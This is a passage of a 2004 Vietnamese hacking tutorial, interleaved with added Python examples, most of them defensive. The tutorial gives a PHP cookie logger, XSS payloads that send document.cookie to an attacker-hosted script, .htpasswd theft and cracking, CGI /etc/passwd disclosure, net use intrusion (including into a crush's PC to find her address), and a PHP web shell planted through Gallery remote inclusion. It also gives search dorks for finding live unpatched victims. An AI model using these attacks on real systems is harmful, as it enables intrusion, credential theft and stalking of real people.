fseek($fp, 0, SEEK_END);
fwrite($fp, $myData);
fclose($fp);
?>

or

CODE
<?php
if (!empty($_GET['contents']) && !empty($_GET['header'])) {
    mail("victim@yahoo.com", "from mail script", $_GET['contents'], $_GET['header'])
        or die('couldnt email it');
    sleep(2);
?>
<script language="javascript">
// (script body not preserved in the original post)
</script>
<?php
} else {
    echo "nope";
}
?>

(Change victim@yahoo.com to your own email address.) Save this notepad file as <any name>.php (it must end in .php) and upload it to a host that supports PHP; in my example it is abc.php. (Those of you who have built websites will find this very easy, right?) This code steals the victim's information (sometimes including the cookie) when they open data containing it, and automatically saves that information to a file named <victim's ip>.txt.
_ There is one more way to grab the cookie, used on forums that have this bug and have not fixed it: when you post, just add the following code to your post (the logger above records every GET parameter, so the parameter name does not matter):

CODE
document.write('<img src="http://host_php/abc.php?docs=' + escape(document.cookie) + '">')

where host_php is the address where you uploaded the cookie-stealing file, and abc.php is my example file.
_ Example: applied inside an img tag, we write it as follows:

CODE
<img src="javascript:document.write('<img src=http://host_php/abc.php?docs=' + escape(document.cookie) + '>')">

or, with the angle brackets written as HTML entities to slip past a filter:

CODE
[img]javascript:document.write('&#x3cimg src=http://host_php/docs.php?docs=' + escape(document.cookie) + '&#x3e')[/img]
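Two things decide whether the snippets in section 21 work: whether the forum echoes a member's post into the page without escaping it, and whether the browser lets script read the cookie at all. As an added example (not from the original article), the Python below does both checks: it audits constructed Set-Cookie headers for the Secure and HttpOnly attributes (HttpOnly, which the cookie description in section 20 predates, keeps document.cookie from seeing the value at all), and it renders the article's own image payload through an unescaped and an escaped post renderer so the difference is visible. The header values and the forum markup are made up.

```python
import html
from http.cookies import SimpleCookie

# Constructed Set-Cookie headers; the second is how a forum should issue a session cookie.
SAMPLE_SET_COOKIE = [
    "session=abc123; Path=/; Domain=forum.example.net; Expires=Wed, 10 Nov 2004 15:00:00 GMT",
    "session=abc123; Path=/; Secure; HttpOnly",
]

# The payload from section 21, exactly as a member would paste it into a post.
PAYLOAD = ("<img src=\"javascript:document.write('<img src=http://host_php/abc.php?docs='"
           "+escape(document.cookie)+'>')\">")


def audit_set_cookie(header: str) -> dict:
    """Parse one Set-Cookie header and report the attributes that matter here.
    Secure: only sent over HTTPS (section 20's 'encrypted in transit', nothing more).
    HttpOnly: invisible to document.cookie, so the payload above collects nothing."""
    jar = SimpleCookie()
    jar.load(header)
    report = {}
    for name, morsel in jar.items():
        secure = bool(morsel["secure"])
        httponly = bool(morsel["httponly"])
        report[name] = {
            "secure": secure,
            "httponly": httponly,
            "readable_by_script": not httponly,
            "domain": morsel["domain"] or "(host only)",
            "expires": morsel["expires"] or "(session)",
        }
    return report


def render_post_unsafe(body: str) -> str:
    """The bug the forums in section 21 had: member input dropped straight into the page."""
    return f'<div class="post">{body}</div>'


def render_post_safe(body: str) -> str:
    """The fix: escape <, >, &, and quotes; the payload is shown as text, not executed."""
    return f'<div class="post">{html.escape(body, quote=True)}</div>'


def payload_survives(rendered: str) -> bool:
    """Does the rendered page still contain a live <img tag from the payload?"""
    return "<img src=" in rendered


if __name__ == "__main__":
    for h in SAMPLE_SET_COOKIE:
        print(audit_set_cookie(h))
    print("unsafe:", payload_survives(render_post_unsafe(PAYLOAD)))
    print("safe:  ", payload_survives(render_post_safe(PAYLOAD)))
```

Escaping at output time is the fix for the forum bug; HttpOnly is the belt to go with it, because it limits the damage from any injection the escaping misses. Neither helps the ikonboard-era forums named below unless their maintainers apply them.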

_ You can find websites to practise this on by searching google.com for forums with this bug, using the keyword "Powered by .. forum" with these forums: ikonboard, Ultimate Bulletin Board, vBulletin Board, Snitz. With luck you will find forums that have not fixed it yet; whoever finds one, share it with everyone.
_ There are many other good cookie-stealing snippets; look for them yourselves.

22.) Breaking a website's password protection:
_ When you hunt for information on a website, some places on the site stop you and pop up a box asking for a password. That is a private area hiding secret information meant for one person or a group (the place where viethacker.net keeps its hacking ideas, the one e-Chip wrote about, for instance). When you click such a link it (usually) calls .htpasswd and .htaccess, which sit in the protected directory of the site. Why is there a dot in front of the name .htaccess? Files whose names begin with a dot "." are treated by web servers as configuration files, and they are hidden when you look at a directory protected by an .htaccess file. These two files control access to the secured link you want to get into: .htpasswd holds the usernames and password hashes, and .htaccess tells the server that the directory needs authentication and where that password file is. Only when you enter both correctly does the link open. Look at this example:

CODE
Graham:F#.DG*m38d%RF
Webmaster:GJA54j.3g9#$@f

You can read the usernames, but do you understand what the passwords say? Of course not. Do you know why you cannot read them? They are not stored as plain text but as one-way hashes (crypt(3) in the original Apache format), so nothing in the file can be turned back into a password; a guess can only be hashed and compared. Since both files sit in the same directory and back each other up, there is no point trying to get in and crack that damn password directly (I have no way of cracking the password yet; I am still researching a direct way in, and if I succeed I will post it). But here is the thing: what if .htpasswd lies outside the directory protected by .htaccess? Then we can grab it easily. Look at this example link: http://www.company.com/cgi-bin/protected/

To check whether .htpasswd is protected by .htaccess, enter this URL: http://www.company.com/cgi-bin/protected/.htpasswd If you get "File not found" or similar, the file is definitely not protected there; look for it with one of these URLs:
http://www.company.com/.htpasswd
http://www.company.com/cgi-bin/.htpasswd
http://www.company.com/cgi-bin/passwords/.htpasswd
http://www.company.com/cgi-bin/passwd/.htpasswd
If you still do not find it, keep trying similar URLs (it may be right in the root directory) until you find it. Once you have the file, use "John the Ripper" or "CrackerJack" to crack the passwords in it. You surely know what to do next: take a valid username and password, go in and see what the fellows have hidden in there; but do not change their passwords or play tricks on them. This method can also be used to get the admin's password, since most members of a closed group hold admin rights.
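As an added example for section 22 (mine, not the author's), the Python below shows what "crack the passwords in .htpasswd" amounts to, using Apache's {SHA} scheme (htpasswd -s) because it reproduces in a few lines; the author's sample values above are not real hashes in any scheme. The file is constructed with the two usernames from the author's example and made-up passwords, plus one entry in a salted scheme to show what gets skipped. Because {SHA} entries carry no salt, one table of hashed wordlist entries checks every user at once, which is exactly why salted schemes (crypt(3), apr1, bcrypt) are preferred; entries in those schemes are left to John the Ripper.

```python
import base64
import hashlib

WORDLIST = ["password", "123456", "letmein", "webmaster", "qwerty", "graham"]


def sha_htpasswd(password: str) -> str:
    """Apache {SHA}: unsalted SHA-1 of the password, base64-encoded."""
    digest = hashlib.sha1(password.encode("utf-8")).digest()
    return "{SHA}" + base64.b64encode(digest).decode("ascii")


# Constructed .htpasswd: the author's two usernames, passwords made up here.
# The third line is a made-up apr1-style (salted MD5) entry, not a valid hash.
SAMPLE_HTPASSWD = "\n".join([
    "Graham:" + sha_htpasswd("letmein"),
    "Webmaster:" + sha_htpasswd("Tr0ub4dor&3"),
    "olduser:$apr1$saltsalt$abcdefghijklmnopqrstuv",
])


def parse_htpasswd(text: str) -> dict:
    """user -> hash string; skips blank and comment lines."""
    users = {}
    for line in text.splitlines():
        if not line or line.startswith("#") or ":" not in line:
            continue
        user, h = line.split(":", 1)
        users[user] = h
    return users


def crack_sha(users: dict, wordlist: list) -> dict:
    """Dictionary attack on {SHA} entries. Hash the wordlist once, then look each
    user's hash up: no salt means one table serves every account in the file."""
    candidates = list(wordlist) + list(users) + [u.lower() for u in users]
    table = {sha_htpasswd(w): w for w in candidates}
    found = {}
    for user, h in users.items():
        if not h.startswith("{SHA}"):
            continue  # crypt/apr1/bcrypt need per-entry salted hashing; use John
        if h in table:
            found[user] = table[h]
    return found


if __name__ == "__main__":
    users = parse_htpasswd(SAMPLE_HTPASSWD)
    print(crack_sha(users, WORDLIST))
```

Note that the password table is built before the loop and never touches the user's hash: with a salted scheme you would have to redo the whole wordlist per user, which is the entire point of the salt.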

23.) About CGI:
_ CGI stands for Common Gateway Interface. Most websites use CGI programs (called CGI scripts) to do the jobs that need doing 24 hours a day. CGI scripts are really programs written and uploaded to the site, mainly in Perl, C, C++ or VBScript; Perl is the favourite because it is easy to write, takes little space and above all can run continuously around the clock.
_ CGI scripts are normally kept in the /cgi-bin/ directory of the site, as in this example: http://www.company.com/cgi-bin/login.cgi

and do concrete jobs such as:
+ Counting visitors.
+ Deciding what visitors may and may not do on your site.
+ Managing members' usernames and passwords.
+ Providing mail.
+ Providing link pages and passing messages between members.
+ Producing detailed error messages, and so on.

24.) The most basic way to hack a site through CGI scripts:
_ Bug 1: the nph-test-cgi bug
+ Type the vulnerable site's name into your browser.
+ Add the following to the end: /cgi-bin/nph-test-cgi
+ The URL now looks like this: http://www.servername.com/cgi-bin/nph-test-cgi
+ If it works you will see the directories kept inside. To look into a directory, add:

CODE
?/*

+ The password file is usually kept in the /etc directory, so type this URL:
http://www.servername.com/cgi-bin/nph-test-cgi?/etc/*
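Both bugs in this section come down to one mistake: a CGI script that hands whatever follows the ? to the shell or to open() without checking that it still points inside the site. As an added example (my code, not the page's), the Python below builds a throw-away document tree, shows the unconfined listing that the ?/etc/* trick effectively gave, and beside it a confined version that refuses absolute paths, ".." components and symlinks that resolve outside the document root. The directory layout is constructed.

```python
import glob
import os
import tempfile
from pathlib import Path


def make_demo_tree() -> Path:
    """Constructed layout: a docroot with two entries, a secret file beside it,
    and (where the OS allows) a symlink from the docroot to that secret."""
    base = Path(tempfile.mkdtemp(prefix="cgidemo_"))
    root = base / "htdocs"
    (root / "cgi-bin").mkdir(parents=True)
    (root / "index.html").write_text("<h1>hello</h1>\n")
    (base / "secret.txt").write_text("not for the web\n")
    try:
        os.symlink(base / "secret.txt", root / "out")
    except OSError:
        pass  # no symlink support here: the confined listing is the same either way
    return root


def list_unconfined(pattern: str) -> list:
    """What nph-test-cgi did in effect: shell-expand the query anywhere on disk."""
    return sorted(glob.glob(pattern))


def list_confined(docroot: Path, pattern: str) -> list:
    """Expand `pattern` only inside docroot. Rejects absolute patterns and any
    '..' component up front, then drops matches whose resolved path (symlinks
    followed) is not under the resolved docroot."""
    root = Path(docroot).resolve()
    p = Path(pattern)
    if p.is_absolute() or ".." in p.parts:
        raise PermissionError(f"refusing pattern outside docroot: {pattern}")
    inside = []
    for match in root.glob(pattern):
        real = match.resolve()
        if real == root or root in real.parents:
            inside.append(str(real.relative_to(root)))
    return sorted(inside)


if __name__ == "__main__":
    root = make_demo_tree()
    print("unconfined /etc/*:", list_unconfined("/etc/*")[:3], "...")
    print("confined *:", list_confined(root, "*"))
    for bad in ("/etc/*", "../*"):
        try:
            list_confined(root, bad)
        except PermissionError as e:
            print("blocked:", e)
```

The symlink case is the one string checks miss: "out" passes every textual test, and only resolving it and comparing against the resolved root shows it points at secret.txt outside the tree.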

_ Bug 2: the php.cgi bug
+ As above, just type this URL to fetch the passwords: http://www.servername.com/cgi-bin/php.cgi?/etc/passwd
The important thing is that these are old bugs, so finding sites to practise on is hard; go to google.com and search for: /cgi-bin/php.cgi?/etc/passwd or cgi-bin/nph-test-cgi?/etc and then check which of the sites found have not fixed the bug.

25.) Breaking into a computer that is online:
_ Breaking into an online computer is both easy and hard. Easy when you use the ENT 3 tool, but the trouble with it is that it slows the victim's machine noticeably, and machines with no shares cannot be entered, so if they switch off before you have grabbed an account you are stuck. A quieter way that slows the machine less and can get in even when the victim shares nothing is to use DOS commands. OK, let's begin:
_ Use an IP scanner such as ENT 3 to scan for the target's IP.
_ Go to Start ==> Run and type cmd.
_ In the DOS window type net view:

CODE
c:\> net view \\203.162.30.xx

_ Look at the result: if there are shares, easy, just type net use <any drive letter on your machine>: \\<victim's share>
+ Example: c:\> net use E: \\203.162.30.xx\C
_ If connecting to the victim's machine asks for a password, download a password-guessing program (I suggest pqwak2 for guessing share passwords on machines running Win98 or WinMe, and xIntruder for Win NT). Both are used the same way: on the first line enter the victim's IP, on the second the name of the victim's share; for xIntruder you also have to set a sensible Delay, about 100 on a LAN and around 5000 on the Internet.
_ If the victim's machine has no shares, type: net use <any drive letter on your machine>: \\<ip>\c$ (or d$) "administrator"

+ Example: net use E: \\203.162.30.xx\C$ "administrator"
The c$ share is a default on every machine and the USER is "administrator"; it is the administrative share, so it only opens to someone holding the Administrator password, and the command above only works where that password is blank or already known.
_ We can use this method to get into the machine of a girl we have a crush on, to look for data about her address (provided she is on a home computer and you are lucky enough to find it). Just chat with her on Yahoo Messenger, then open DOS and type: c:\> netstat -n While doing this, close every other window and leave only the chat window with her; that makes it easier to pick out her IP address. Then use the intrusion method above. (That lad tykhung of ours probably used this trick back when he courted his long-distance girlfriend, to sneak in and find her address, hehe.) You will succeed if the victim's machine has no firewall or proxy.
===================================================
Many of you have asked me to give exact addresses to practise on, but I cannot; I learned my lesson from guides that gave exact addresses: after practising and gaining admin rights, some of you deleted their databases. That would make HVA a byword for destruction on the net. Please understand; I will only show you how to find vulnerable addresses, not give out specific ones.
===================================================
In part 4 I will cover protecting your own computer from intrusion while online, an outline of the steps taken when hacking a website, finding vulnerable sites to practise on, hacking sites through the Gallery bug, and so on. GOOD LUCK!!!

The most basic things to know to become a Hacker - Part 4 [12/7/2004 10:37:00 AM]

26.) About RPC (Remote Procedure Call):
_ Windows NT provides the ability to use RPC to run distributed applications. Microsoft RPC consists of the libraries and services that let distributed applications work in the Windows NT environment. A distributed application consists of several processes carrying out some defined task. These processes can run on one or more computers.
_ Microsoft RPC uses a name service provider to locate servers on the network. The Microsoft RPC name service provider must conform to the Microsoft RPC name service interface (NSI). NSI consists of API functions that allow access to multiple entities in the same name service database (the name service database holds the entities, groups of entities, and the history of entities on the server). When Windows NT is installed, Microsoft Locator is automatically selected as the name service provider. It is the best name service provider for a Windows NT network environment.

27.) A simple technique for stopping unauthorized intrusion while you are online, through RPC (Remote Procedure Call):
_ If you suspect someone is intruding into your machine or an admin is watching you through remote desktop, just turn off the remote procedure call feature; then no program can currently watch you over remote desktop. It also blocks most intrusion tools (since most such tools connect on top of remote procedure call (over tcp/ip)). Most trojans also rely on this protocol. To turn it off: go to Services, right-click Remote Procedure Call, choose Startup type / Disabled (or Manual) and Apply. This is a very effective defense for a PC, and combined with turning off file sharing it becomes very hard to hack, but on a LAN it will cause you plenty of trouble, because programs that depend on this service will no longer run. Choose according to how you work. In my opinion, on a LAN installing a firewall already makes you reasonably safe. (Based on an article by brother khoaimi, HVA admin)

28.) The steps of hacking a website today:
_ According to the list in the book Hacking Exposed 3, hacking a website usually follows these steps:
+ FootPrinting: this is what a hacker does to collect as much information as possible about the server/business/user. It covers details of IP addresses, Whois, DNS, and so on, sometimes official information related to the target. Often the hacker simply uses search engines on the net to find this information.
+ Scanning: once the information is in hand, the next step is to evaluate and identify the services the target runs. This includes port scanning, OS fingerprinting, etc.
Tools used here are nmap, WS pingPro, siphon, fscam and many others.
+ Enumeration: the third step is to look for poorly protected resources or user accounts that can be used to break in. This includes default passwords, default scripts and services. Many network administrators don't know about these or don't change the default values.
+ Gaining Access: now the intruder tries to get into the network using the information obtained in the three steps above. Methods used here may be buffer overflow attacks, grabbing and decrypting the password file, or, crudest of all, brute force (trying every possibility) on the password. Tools commonly used at this step are NAT, podium, or L0pht.
+ Escalating Privileges: for example, if the hacker got into the network with a guest account, he will try to take control of the whole system. The hacker will try to crack the admin's password or use a privilege-escalation hole. John the Ripper is a password-cracking program that is used very often.
+ Pilfering: (used when files containing passwords are exposed) once again search engines are used to find ways into the network. Text files containing passwords or other insecure mechanisms can be easy prey for the hacker.
+ Covering Tracks: after getting the needed information, the hacker tries to erase his traces, deleting the OS log files so the administrator doesn't notice the system was penetrated, or, if he does, can't find out who the intruder was.
+ Creating "Back Doors": (creating a back door so the next intrusion is easier) the hacker leaves "Back Doors", i.e. a mechanism that lets him get back in by a secret path without much effort, by installing a Trojan or creating a new user (in organizations with many users). Tools here are the various Trojans and keyloggers.
+ Denial of Service (DoS): if the intrusion fails, DoS is the last resort for attacking the system. If the system is not configured properly, it will break and let the hacker in. Otherwise DoS will make the system stop working. Tools commonly used for DoS attacks are trin00, Ping of Death, teardrop, various nukers and flooders. This method is very dangerous and still widely used today.
_ Depending on a hacker's knowledge and skill, some steps may be skipped. They need not be followed in order. Remember the saying: know your enemy and know yourself, and you will win a hundred battles. (Material from HVA and hackervn.net)

29.) How to find vulnerable websites:
_ You surely know the websites dedicated to searching for information on the net? But you probably didn't expect that they can be used to find vulnerable websites (I usually use google.com and recommend you do too, since it is very powerful and effective).
_ If you are interested in website vulnerabilities and want to find them, just go to google.com and type the vulnerable fragment after allinurl:. For example, given the following vulnerable fragment: cgi-bin/php.cgi?/etc/passwd you would type: allinurl:cgi-bin/php.cgi?/etc/passwd It lists the websites that have this flaw; look at the bottom of each listed result (the green address line): if a line matches exactly the keyword you entered, the page is or was vulnerable. Whether you can get in also depends on whether the website has fixed the flaw yet.
_ If you are interested in forum vulnerabilities and want to find forums of a given type to practice on, just enter the keyword powered by. For example, to find forums of the Snitz 2000 type: powered by Snitz 2000
_ However, finding the right vulnerable forum or website this way does not have a high success rate; pay attention to the special string in the URL that is characteristic of each kind of website or forum (this is very important; please look into it yourselves). For example, to search for the Hosting Controller vulnerability, the characteristic fragments are "/admin or /advadmin or /hosting", so we type: allinurl:/advadmin or allinurl:/admin or allinurl:/hosting It lists the websites with URLs of the form http://tentrangweb.com/advadmin or http://tentrangweb.com/admin or http://tentrangweb.com/hosting For example, UBB forums have the characteristic fragment "cgi-bin/ultimatebb.cgi?"; we search for them the same way. Once you know how to search like this, you only need to follow the updates on the HVA Security Vulnerabilities board posted daily by LeonHart, understand what they mean, and check for yourself.

30.) Hacking websites through the Gallery vulnerability (a form of the PHP code injection vulnerability):
_ Gallery is a tool for creating a photo gallery on the web, written in PHP. Exploiting its hole, we can inject extra PHP code that lets us upload, which is our main purpose.
_ First register a free host; brinkster.com is the easiest. Then open notepad and create a PHP file with the following code:
CODE
<?php
global $PHP_SELF;
echo "<form method=post action=$PHP_SELF?$QUERY_STRING>
<input type=text name=shell size=40>
<input type=hidden name=act value=shell>
<input type=submit value=Go name=sm>";
set_magic_quotes_runtime(1);
if ($act == "shell") {
    echo "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n<xmp>";
    system($shell);
    echo "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
}
echo "";
?>

Make two files with different names (but the same code) from this code, named:
+ shellphp.php: this file is used to run a shell on the victim host.
+ init.php: this file is uploaded to the host page you just created. (Upload this init.php early; we will need it again, but with different code. If you forget to upload this file, it's over.)
Create another PHP file with the following code:
CODE
<?php
function handleupload() {
    if (is_uploaded_file($_FILES['userfile']['tmp_name'])) {
        $filename = $_FILES['userfile']['tmp_name'];
        print "$filename was uploaded successfully";
        $realname = $_FILES['userfile']['name'];
        print "realname is $realname\n";
        print "copying file to uploads dir " . $realname;
        copy($_FILES['userfile']['tmp_name'], *PATH* . $realname); // note: *PATH* will be replaced later
    } else {
        echo "Possible file upload attack: filename" . $_FILES['userfile']['name'] . ".";
    }
}
if ($act == "upload") {
    handleupload();
}
echo "<form ENCTYPE=multipart/form-data method=post action=$PHP_SELF?$QUERY_STRING>
File:<INPUT TYPE=FILE NAME=userfile SIZE=35>
<input type=hidden name=MAX_FILE_SIZE value=1000000>
<input type=hidden name=act value=upload>
<input type=submit value=Upload name=sm>";
?>

Name it upload.php; it is the file that will be uploaded to the victim's website.
_ Next, go to Google, type "Powered by gallery" and press enter; Google lists a pile of sites using Gallery. Pick any page and use the following link to test whether it is still vulnerable to the Gallery flaw:
http://<victim website>/gallery/captionator.php?GALLERY_BASEDIR=http://wwwxx.brinkster.com/ /
If you see a rectangle at the very top, with a Go button to its right for submitting commands, you have found your target. Now you can type commands through this rectangle to hack the victim's website. First type the command pwd to determine the absolute path of the current directory and press Go; when it returns the result, quickly note down the path shown below (I'll use the example path I found: /home/abc/xyz/gallery). Next type the command ls -al to list its subdirectories. Now look at the result: you will see a pile of subdirectories listed. Always remember that our goal is to find a directory we can use to upload the upload.php file we prepared, so look carefully at the last characters of each result line:
+ Exclude the directories marked . or .., since they are the root directory or virtual directories (usually at the top of the result lines).
+ Also exclude lines whose last characters carry an extension (e.g. config.php, check.inc etc.), since those are files, not directories.
+ What remains are directories we can upload to, but I advise choosing lines with a directory name whose count is greater than 1 (you can see it in the 2nd column from the left), because that is certainly a real directory and not a virtual one, and it makes it harder for the website's admin to notice when we put our file in. In my example I found the directory loveyou containing 12 files where we can upload, so the official path we will upload to is: /home/abc/xyz/Gallery/loveyou
Now go into your host account and edit init.php to have the same code as upload.php, but change *PATH* to /home/abc/xyz/gallery/loveyou/. Also prepare an upload.php on your own machine with *PATH* set to "" (two double quotes). Now we can upload upload.php to the victim's website; enter the following address in your web browser:
http://<victim website>/gallery/captionator.php?GALLERY_BASEDIR=http://wwwxx.brinkster.com/ /
You will see another rectangular box with two buttons next to it, a browse button and an upload button. Use the browse button to point to the upload.php file you prepared on your machine; pressing upload will upload upload.php to the victim's website. OK, now you have completed the hacking part. From here on, use what you've learned to attack the opponent, e.g. grab the database, passwords (do as in the earlier hacking tutorials), but only practice, don't delete their database or deface their website. If you are a genuine hacker you only need to upload a page saying "Hacked by ..." to the website. As before, whether you succeed depends on luck and on persistently studying and applying your knowledge. (Based on the hacking guide by brother vnofear of viethacker.net)
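What the GALLERY_BASEDIR parameter above illustrates on the defending side is that an application must never build the path of a file it includes from a request parameter. This added example (not the tutorial's and not Gallery's code; names and the root directory are this example's own) shows the weak pattern next to a resolver that refuses URLs, absolute paths and traversal and accepts only subdirectories of one allowed root:

```python
"""Added example: validating a "base directory" request parameter such as
Gallery's GALLERY_BASEDIR.  Not the tutorial's or Gallery's code.

The remote-include attack works because the application builds the path of
the file it includes from a value the client controls, so the client can
point it at a URL on another host or anywhere on disk.  The resolver below
accepts only a relative path that still lies under one allowed root.
"""
import posixpath
from urllib.parse import urlsplit

# Constructed install root for the example; a deployment would use the
# application's real directory.
ALLOWED_ROOT = "/var/www/gallery"


def vulnerable_init_path(basedir: str) -> str:
    """The weak pattern: trust the parameter and append the file name."""
    return basedir + "init.php"


def safe_init_path(basedir: str, root: str = ALLOWED_ROOT) -> str:
    """Return the init.php path under root, or raise ValueError.

    Works on the string form only (posixpath), so it is deterministic and
    needs no filesystem; a deployment with symlinks under root should also
    compare os.path.realpath() of the result against root.
    """
    if not basedir:
        raise ValueError("empty base directory")
    # 1. Anything that parses as a URL (scheme or //host) is a remote include.
    if urlsplit(basedir).scheme or basedir.startswith("//"):
        raise ValueError("remote base directory refused")
    # 2. Only subdirectories of root are allowed: no absolute paths,
    #    no backslashes (Windows separators), no NUL bytes.
    if basedir.startswith("/") or "\\" in basedir or "\x00" in basedir:
        raise ValueError("absolute or malformed base directory refused")
    # 3. Normalise ".." and "." and verify the result is still inside root.
    root_norm = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root_norm, basedir))
    if candidate != root_norm and not candidate.startswith(root_norm + "/"):
        raise ValueError("base directory escapes the allowed root")
    return posixpath.join(candidate, "init.php")


def classify(basedir: str) -> str:
    """'ok:<path>' or 'refused:<reason>', for a quick table of inputs."""
    try:
        return "ok:" + safe_init_path(basedir)
    except ValueError as exc:
        return "refused:" + str(exc)


if __name__ == "__main__":
    # Constructed inputs: the tutorial's remote URL, traversal, and a
    # legitimate subdirectory.
    for value in ("http://wwwxx.brinkster.com/", "../../../etc/",
                  "albums/2004/", "./"):
        print(repr(value), "->", classify(value))
```

In PHP itself the matching controls are turning off allow_url_fopen, so that include() cannot fetch a URL, and not letting request parameters populate global variables (register_globals).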

GOOD LUCK!!!!!!!!!!!! (End of part 4) Anhdenday HVAonline.net

The most basic things to know to become a Hacker - Part 5 [12/22/2004 9:57:00 AM]

31.) What is a TCP/IP packet? TCP/IP stands for Transmission Control Protocol and Internet Protocol; a TCP/IP packet is a block of data that is compressed, then given a header and sent to another computer. This is how the internet transmits information: by sending packets. The header of a packet contains the IP address of the packet's sender. You can rewrite a packet and make it look as if it came from someone else!! You can use this to try to get into many systems without being caught. You will have to run Linux or have a program that lets you do this.

32.) What is Linux:
_ In its original sense, Linux is the kernel of an OS. The kernel is the piece of software responsible for communication between application programs and the hardware, providing functions such as file management, virtual memory management, and I/O devices such as ports, screen, keyboard, etc. But the Linux kernel is not yet an OS, so it must be combined with the application programs written by the GNU organization to make a complete OS: the Linux OS. That is why we see GNU/Linux whenever Linux is mentioned. Next, a company or organization packages these products (kernel and application programs), adjusts some configuration that is characteristic of the company/organization, and adds an installation process for the Linux set, giving us a Distribution. Distributions differ in the number and kind of software packaged, in the installation process, and in kernel versions. Some major Linux distributions today are Debian, Redhat, Mandrake, SlackWare and Suse.

33.) Basic commands to know when using or breaking into a Linux system:
_ man: when you want to know how to use a command, use this one. Syntax: $ man <command>. Example: $ man man
_ uname: gives basic information about the system. Example: $ uname -a; it outputs: Linux gamma 2.4.18 #3 Wed Dec 26 10:50:09 ICT 2001 i686 unknown
_ id: show the current uid/gid (current user and group)
_ w: show the users logged in and what they are doing on the system. Example: $ w outputs: 10:31pm up 25 days, 4:07, 18 users, load average: 0.06, 0.01, 0.00
_ ps: show information about the processes on the system. Example: $ ps axuw

_ cd: to move to a directory, remember this command. Example: $ cd /usr/bin ----> takes you to the bin directory
_ mkdir: create a directory. Example: $ mkdir /home/convit ---> creates the directory convit in /home
_ rmdir: remove a directory. Example: $ rmdir /home/conga ----> removes the directory conga in /home
_ ls: list directory contents. Example: $ ls -laR /
_ printf: print formatted data, like printf() in C++. Example: $ printf %s "\x41\x41\x41\x41"
_ pwd: print the current directory. Example: $ pwd ------> tells us where we are: /home/level1
_ cp, mv, rm: copy, move, delete files. Example with rm (del): $ rm -rf /var/tmp/blah -----> deletes the file blah. Same for cp and mv.
_ find: search for files and directories. Example: $ find / -user level2
_ grep: search tool; simplest use: grep "something". Example: $ ps axuw | grep "level1"
_ strings: print all printable characters in a file. Use it to find string declarations in a program, or system calls, and sometimes even passwords. Example: $ strings /usr/bin/level1
_ strace: (linux) trace system calls and signals, very useful for following a program's flow, the fastest way to find where a program fails. On other unix systems the equivalent tools are truss and ktrace. Example: $ strace /usr/bin/level1
_ cat, more: print a file's contents to the screen. $ cat /etc/passwd | more --> outputs the passwd file the fastest way. $ more /etc/passwd ----> outputs the passwd file page by page.
_ hexdump: print the ascii, hex, octal and decimal values of the input. Example: $ echo AAAA | hexdump
_ cc, gcc, make, gdb: compile and debug tools. Example: $ gcc -g -o bof bof.c. Example: $ make bof. Example: $ gdb level1 (gdb) break main (gdb) run
_ perl: a language. Example: $ perl -e 'print "A"x1024' | ./bufferoverflow (buffer overflow when we feed in 1024 characters)
_ bash: try to automate your tasks with shell scripts; very powerful and flexible.

To learn about bash and how it works: $ man bash
_ ls: view directory contents (list the files in a directory). Example: $ ls /home ----> shows all files in the Home directory; $ ls -a -----> shows all files, including hidden files; $ ls -l -----> gives information about the files
_ Writing output to a file. Example: $ ls /usr/bin > ~/convoi ------> writes the listing of the bin directory into the file convoi.

34.) Basic things to know about Linux:
a.) Some important directories on a server:
_ /home: where user files are kept (e.g. a user logging in as convit gets a directory /home/convit)
_ /bin: where the essential basic Unix commands such as ls live.
_ /usr/bin: where other special commands live, commands used by special users and for system administration.
_ /boot: where the kernel and the other files used at boot live.
_ /etc: network configuration files, NFS (Network File System), mail (this is the critical place we most need to exploit)
_ /var: administrative files
_ /usr/lib: standard libraries such as libc.a
_ /usr/src: where program sources live.
b.) Location of the password file on various versions:
CODE
System                 Password file                    Token
AIX 3                  /etc/security/passwd             !
                       /tcb/auth/files//
A/UX 3.0s              /tcb/files/auth/?/*
BSD4.3-Reno            /etc/master.passwd               *
ConvexOS 10            /etc/shadpw                      *
ConvexOS 11            /etc/shadow                      *
DG/UX                  /etc/tcb/aa/user/                *
EP/IX                  /etc/shadow                      x
HP-UX                  /.secure/etc/passwd              *
IRIX 5                 /etc/shadow                      x
Linux 1.1              /etc/shadow                      *
OSF/1                  /etc/passwd[.dir|.pag]           *
SCO Unix #.2.x         /tcb/auth/files//
SunOS4.1+c2            /etc/security/passwd.adjunct     ##username
SunOS 5.0              /etc/shadow
System V Release 4.0   /etc/shadow                      x
System V Release 4.2   /etc/security/* database
Ultrix 4               /etc/auth[.dir|.pag]             *
UNICOS                 /etc/udb                         *

35.) Exploiting Linux through the security hole in the WU-FTP server:
_ WU-FTP Server (developed by the University of Washington) is FTP server software widely used on Unix and Linux systems (all distributors: Redhat, Caldera, Slackware, Suse, Mandrake...) and even Windows...; hackers can execute their commands remotely through file globbing by overwriting a file on the system.
_ However, exploiting this flaw is not easy, since it requires the following conditions:
+ You must have an account on the server.
+ You must place shellcode in the server process's memory.
+ You must send a special FTP command containing a special globbing pattern without the server detecting the error.
+ The hacker overwrites a function, pointing code at a shellcode, so that it is executed by the FTP server itself.
_ Let's analyze the following example of overwriting on an FTP server:
CODE
ftp> open localhost                                    <== open the vulnerable site.
Connected to localhost (127.0.0.1).
220 sasha FTP server (Version wu-2.6.1-18) ready       <== connected to the FTP server.
Name (localhost:root): anonymous                       <== enter the name here
331 Guest login ok, send your complete e-mail address as password.
Password:..                                            <== enter the password here
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.                   <== binary mode for transferring files.
ftp> ls ~{                                             <== list the current directory.
227 Entering Passive Mode (127,0,0,1,241,205)
421 Service not available, remote server has closed connection
1405 ?     S    0:00 ftpd: accepting connections on port 21     <== accepting connections on port 21.
7611 tty3  S    1:29 gdb /usr/sbin/wu.ftpd
26256 ?    S    0:00 ftpd: sasha:anonymous/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
26265 tty3 R    0:00 bash -c ps ax | grep ftpd
(gdb) at 26256
Attaching to program: /usr/sbin/wu.ftpd, process 26256   <== exploiting the wu.ftpd flaw.
Symbols already loaded for /lib/libcrypt.so.1
Symbols already loaded for /lib/libnsl.so.1
Symbols already loaded for /lib/libresolv.so.2
Symbols already loaded for /lib/libpam.so.0
Symbols already loaded for /lib/libdl.so.2
Symbols already loaded for /lib/i686/libc.so.6
